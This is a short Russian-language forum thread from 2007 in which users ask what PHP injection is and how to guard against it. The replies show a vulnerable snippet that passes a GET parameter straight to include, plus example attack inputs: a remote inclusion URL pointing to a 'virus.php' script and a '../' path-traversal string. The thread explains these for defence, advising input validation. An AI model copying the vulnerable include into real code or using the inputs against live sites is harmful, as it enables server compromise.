|
| |
|
|
| |
для: DEM
(16.04.2007 в 12:04)
| | | Не используйте динамических строк в include и require - никаких, даже если вам кажется, что они безобидные. | |
| |
|
|
| |
|
|
| |
для: coloboc66
(16.04.2007 в 12:26)
| | | Да. | |
| |
|
|
| |
|
|
| |
для: CrazyAngel
(16.04.2007 в 13:38)
| | | Вариантов много:
index.php?pages=http://mysite.ru/virus.php
или комбинация из одинарных и двойных точек
index.php?pages=../../../../*.* | |
| |
|
|
| |
|
|
| |
для: DEM
(16.04.2007 в 12:17)
| | | данные которые от пользователя поступают, например есть php скрипт
<?php
include $_GET['pages'];
?>
|
ссылка на него index.php?pages=main.php
Просто заменив переменную в Get мы пожем подключить любую страницу, например изменить ссылку так index.php?pages=admin.php | |
| |
|
|
| |
|
|
| |
для: coloboc66
(16.04.2007 в 12:26)
| | | Если в файл включается (include, require...) какой-нить еще файл, то можно вместо включаемого подставить свой, например. Или, если кто-то юзает eval(), тоже можно как-нить... | |
| |
|
|
| |
|
|
| |
для: DEM
(16.04.2007 в 12:17)
| | | А разве реально вообще вставить свой РНР-код в чужой?! | |
| |
|
|
| |
|
|
| |
для: CrazyAngel
(16.04.2007 в 12:07)
| | | Ну как я понял php-инъекции - это засовывание своего РНР кода в чужой... То есть мне всёго лишь надо проверить данные которые вводит юзер и всё? | |
| |
|
|
| |
|
|
| |
для: DEM
(16.04.2007 в 12:04)
| | | может mysql-инекции?
эм... это простые ошибки,
тоесть нужно прежде чем ипользовать данные от юзера, сначала их проверить.... | |
| |
|
|
| |
|
|
| |
для: DEM
(16.04.2007 в 12:04)
| | | :O a Takoe ecTb? | |
| |
|
|
| |
|
|
| | Как отгородиться от сабжа и как он вообще работает? :) | |
| |
|
|
|
